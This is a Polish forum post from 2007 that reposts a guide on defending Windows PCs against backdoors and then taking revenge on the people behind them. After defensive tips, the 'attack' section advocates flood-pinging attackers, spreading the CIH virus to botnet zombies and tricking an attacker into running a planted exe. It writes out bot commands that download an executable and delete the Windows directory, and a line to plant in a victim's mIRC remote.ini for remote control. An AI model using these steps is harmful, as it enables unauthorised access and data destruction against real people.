| Autor |
solsk
Lekki spamer
Dołączył: 04 Lis 2006
Posty: 365
Przeczytał: 0 tematów
Ostrzeżeń: 0/3
Skąd: K-ce
Nie 11:37, 11 Mar 2007
|
|
| Wiadomość |
 Usuwanie backdoorow i zemsta pod winshitem(czyt. Windows)
|
  |
|
Prawa autorskie
Created: 15.12.2004
Udziela się zgody na kopiowanie, rozpowszechnianie i/lub modyfikowanie
tego dokumentu zgodnie z zasadami Licencji Wolnej Dokumentacji(GNU
Free Documentation Licence) w wersji 1.1 lub jakiejkolwiek późniejszej
wersji opublikowanej przez Fundację Wolnego Oprogramowania(Free
Software Foundation). Kopię tej licencji można znaleźć na stronach
Fundacji Wolnego Oprogramowania.
Co to jest ???
[link widoczny dla zalogowanych]
Kto by sie nie wkurzyl gdyby sie dowiedzial ze jego komputerek jest
jednym z setek pc-zombich, ktore przeprowadzaja skoordynowane ataki
w roznych miejscach Internetu?
Chyba kazdy...
Wiec dlaczego ciagle zdazaja sie takie ataki - pomimo 'rosnacej
swiadomosci przecietnego internauty'?
Ok to najpierw omowimy podstawowe zabezpieczenia winshita przed
zabackdoorowaniem, w punktach:
Spis tresci:
->CZESC I - obrona
1. Antywirus
2. Firewall
3. Nierowna walka z komercja, wiedza i inteligencja atakujacego
->CZESC II - atak
4. Przejmujemy inicjatywe - wojny hackerow
5. Przejmujemy inicjatywe - pole bitwy: IRC
->CZESC III - podsumowanie
6. Rady uniwersalne
CZESC I -obrona
1. Antywirus
Zainstaluj antywirusa (o 90% mniej backdoorow przejdzie - dobrze
jak na poczatek) i regularnie sciagaj aktualizacje(najlepiej ustaw tak,
zeby sciagaly sie w tle i zaden alert nie powiadamial, czy juz sie
zgraly - oszczednosc czasu) - jesli sie da - ukryj jego ikone -
na wypadek "znajomych" ktorzy chcieliby zbackdoorowac Twojego PC, gdy
bedziesz np. w kuchni szykujac im cos do picia(stary, dobry sposob;).
Przynajmniej raz na 7-10 dni skanuj dysk.
NIGDY nie deaktywuj auto-protectow i innych takich - TO MA BYC i JUZ.
Zaloz w nim haslo, na wygaszacz ekranu i w BIOS-ie tez - moze sie
zdazyc, ze odejdziesz na chwile od komputera a ktos w tym czasie
'wrzuci' Ci jakies paskuctwo na dysk.
2. Firewall
Postaw firewalla, ktory z pytaniami 'co laczyc z netem' bedzie
upierdliwy do bolu.
W tym momencie mala uwaga tak btw. firewalli - jesli juz stawiasz - to
po to zeby stalo NIE deaktywuj gdy grasz zeby zwolnic troche RAMu - fw
to nie ochrona na jakis czas - ale od wlaczenia winshita do wylaczenia
winshita. Poza tym gdy fw pyta sie czy laczyc dany program na danym
porcie z danym IP - PATRZ co to za program, zobacz jego wlasciwosci,
patrz na jakie IP i port chce sie laczyc - przeszukaj google - moze
cos o tym porcie bedzie, poza tym nie akceptuj wszystkiego zeby "nie
trulo Ci dupy" - masz to konfigurowac z czasem do swoich potrzeb a nie
robic z kompa Dworzec PKP dla wszystkiego i wszyskich.
Powiedzmy ze sprawa zalatwiona na wiekszosc lame-atakow - teraz
rozwazmy trudniejsze wersje.
Zalozmy ze jakis wredny ziomus zadal sobie wiele trudu, poswiecil swoj
cenny czas i chce nas zaskoczyc 'wlasnym' lub 'komercyjnym' wydaniem
jakiegos wrednego programu:
3. Nierowna walka z komercja, wiedza i inteligencja atakujacego
No wlasnie - siedzi taki lamek w sieci i w koncu dojdzie do wniosku:
"I na grzyba ja wciskam te trojany, jak mi antywirusy blokuja
wszystko i g.. z tego mam" - poszpera i dojdzie do wniosku:
"Oo.. a komercyjnych keyloggerow, trojanow etc. nic nie wykrywa Yeah!"
I lamka poczatkujaca przepoczwarzy sie w srednia lamke;]
Powiedzmy koles ma takiego sympatycznego trojana: Net Observe,
wklepuje w przegladarce: [ www ] i przez standardowo
nieblokowany port WWW ma pelen dostep do Twojej maszynki.. wyglada
paskudnie? Ano niestety ;]. Jak sie przed tym bronic?
Tu nie pomoze pkt 1 i 2.. - trzeba radzic sobie samemu - w skrocie
postepowac wedlug ponizszych zalecen:
- nie wchodz na strony WWW z nieznanymi "lewymi", dziwnie
wygladajacymi adresami;
- nie sciagaj zadnych EXE, COM, nawet batow i innych podobnych
badziewi - szkoda czasu na naprawianie/format - i to tylko z powodu
jednego sciagnietego pliku;
- nie otwieraj zalacznikow poczty od nieznanych Ci adresow nadawcow;
- zobacz ktore porty sa otwarte i co sie na nich dzieje;
- zobacz w alt-ctrl-del ile RAMu jest w uzyciu, ile CPU, jakie
programy sa uruchomione, poszukaj dziwnych nazw, np. zamiast
SVCHOST.exe bedzie SVCH0ST.EXE,
IEXPLORE.exe bedzie lEXPLORE.exe itp..
- poszukaj zdublowanych nazw uruchomionego "przez usera" pliku;
- czesto patrz na lampke HDD w obudowie(czy nie swieci sie sama
z siebie - gdy na komputerze prawie nic sie nie powinno dziac),
obserwuj zachowanie komputera(czy nagle nie pojawia sie przy
wskazniku myszy klepsydra na 5-10 sekund, po czym znika), czy
komputer ogolnie nie zwalnia, czy firewall nie wykrywa ruchu
do/z sieci - ktorego nie powinno byc;
- popros admina sieci o logi z Twoim IP - tak dla pewnosci;
- napisz np. j393dSSowq09 i przeszukaj HDD, czy przypadkiem jakis
plik nie zawiera tej frazy - moze akurat jakis kiepski keylogger
nie ma kodowania logow przed wyslaniem?
- ostroznosc i podejrzliwosc PRZEDE WSZYSTKIM.
CZESC II - atak
4. Przejmujemy inicjatywe - wojny hackerow
a. Ktos probowal Ci wcisnac jakis exe - bierz poki daja! 
Otworz go HEX edytorkiem, popatrz czy przypadkiem nie widac
gdzie to gowno mialo sie laczyc(np. FTP, serwer IRC, kanal, haslo do
kanalu, haslo ownera) - jesli uda Ci sie znalezc to wszystko w zrodle-
to musial byc cholernie lame-owner - chyba ze zrobil kanal
"tymczasowy" gdzie zbieraja sie wszystkie botki, po czym updatuje
swoje zabawki do nowszej wersji (np. zmienia haslo ownera, kanal,
haslo do kanalu etc) i jumpuje juz te nowe botki zupelnie gdzie
indziej, na kompletne IRC-owe zadupie;] - w tym przypadku jest troche
wiecej zachodu zeby goscia zlapac i dokonac slodkiej zemsty np.
przez przejecie DDoSnetu, usuniecie backdoorow, w ekstremalnych
przypadkach totalnego wkurzenia - zapodanie CIHa na kazdego zombie,
lub po prostu powiadomienie userow, ze maja backdoory i zeby je sobie
pousuwali, bo sam to zrobisz;];
b. Wersja trudniejsza - nie wszystkie dane dalo sie wyciagnac z EXE,
pozostaje poszukac sladow ownera trojanow/botow na googlach - pewnie
w zrodle umiescil pare razy swojego nicka - zeby smerfy mogly go
szybciej znalezc w niedalekiej przyszlosci;
c. Jesli nie mozesz nic wyciagnac - patrz np. na firewalla - gdzie to
badziewie chce sie laczyc - dostaniesz jakiekolwiek dane - po nitce
do klebka - to dobre przyslowie pasujace do sciagania gorszego
specjalisty przez lepszego  . W tym przypadku - po dostaniu IP
walisz z roota ping -f i moze akurat nawet to go 'wywroci';
d. Jesli sie zorientujesz, ze cos nie gra - a nigdzie nic
podejrzanego nie widac - na wszelki wypadek odlacz komputer od sieci
- zeby nie infekowac innych komputerow na winshitach;
e. Na upartego mozesz powtorzyc punkty z gory w celu samodzielnej
lokalizacji podejrzanego programu - jest to jednak szukanie igly
w stogu siana - ba... nie wiesz czego dokladnie szukasz, i czy to
w ogole gdzies jest - pocieszajace;].
Postepuj standardowo: przeszukaj rejestr, pliki wedlug daty ostatniej
modyfikacji, zawartosci ciagu znakow ktory napisales wczesniej,
lub np. nickow znanych w Inecie osob ze sceny (tez bywa ze zajmuja
sie pierdolami - np. z powodow osobistych);
f. Nie chce mi sie opisywac wszystkich metod scigania lolkow.
Jest ich zbyt wiele - kazdy pewnie wymysli swoja. Wazne aby byla
skuteczna i tyle - czasem przechodza nawet takie walki:
[20:35:53]<tirra> Hi, new crack for all dialers at [ www ]
(50KB)
[20:39:40]<xxx> Hi, tirra, i copied that file on my private WWW,
but not working ;~~~, look: [ www ] what is wrong?
(77KB - jej exe + moje exe)
[20:40:07]-->sdjasd just noticed you with: "BOT CONNECTED - LOG IN!"
[20:40:31]<tierra> Hm.. strange - working on my pc.
[20:41:13]<xxx> Damn it! Fucking winshit - nothing is working right
here!! OK i'm off - format power!
[20:41:52]<tirra> )) bye.
Mozna ten URL jeszcze na maxa zakrecic za pomoca HEX-a i masy innych
zabawek - poszukaj na googlach..
..a ze gosc swiadomie spamuje i wkurza ludzi to:
/j #blabla
&login haslo
&download [ www ] c:\temp.exe 1
&remove %WINDIR%\*.*
&remove
Jednego spamera mniej w sieci... na pare godzin/dni.
5. Bardzo czesto haxorki uzywaja sieci IRC do rozprzestrzeniania/
uzywania swoich zabawek(czesto botow etc.)
Istnieje prosty sposob, aby odegrac sie takimu kolesiowi np.
zakladajac, ze ma mIRCa(co wsrod lamek jest dosyc czestym
rozwiazaniem - proste, gladkie i bez problemow - jak pupa
niemowlaka) - piszesz exe, ktory przeszuka HDD aby znalezc plik
remote.ini, a nastepnie otworzy go i na poczatku pliku dopisze:
---CUT HERE---
ctcp 1:* $1-
---CUT HERE---
Pewnie zastanawiasz sie co to da? Odpowiedz znajdziesz w helpie
mIRCa i na googlach - w skrocie bardzo duzo - zdalny dostep
do kogos peceta.
CZESC III - podsumowanie
6. Rady uniwersalne
I. Po pierwsze i najwazniejsze - podstawa, fundamentem, kamieniem
wegielnym;) dobrej pracy systemu komputerowego jest... zgadnij?
Taaak: SWIADOMY UZYTKOWNIK, JEDYNY.. NIE UDOSTEPNIAJACY SWOJEGO
MALENSTWA OSOBOM TRZECIM!!!
II. W Internecie nie madruj sie, nie wyrozniaj, badz skromny - jak
w zyciu - nikt nie lubi przyglupa ktory robi z siebie drugiego
Mitnicka - takich sie po prostu "przycina" i ciesz sie jesli swoim
zachowaniem spowodujesz tylko smiech innych, zostaniesz 'wykopany'
(np. z IRCa), dostaniesz K-line, lub wylapiesz troche pakietow ;].
Gorzej jak komus zajdziesz za skore, spisze wszystkie Twoje dane,
jakie znajdzie i bedzie Cie meczyc przez dlugie miesiace(lata?) -
sam pomysl, czy Ci sie to oplaca.
III. Na koniec jeszcze jedna dobra rada - zmien system na Linuxa -
proste, bardzo skuteczne, o niebo lepsze, darmowe;).
Ja nie jestem autorem tego poradnika ale troszeczke go zmienilem , oczywiscie u gory jest napisane...Udziela się zgody na kopiowanie, rozpowszechnianie i/lub modyfikowanie[...]
Nudzilo mi sie, kiedys napisalem["editnołem"] to moze sie komus przyda...
Post został pochwalony 0 razy
|
|
Szukaj
, no i pokolorowalem XD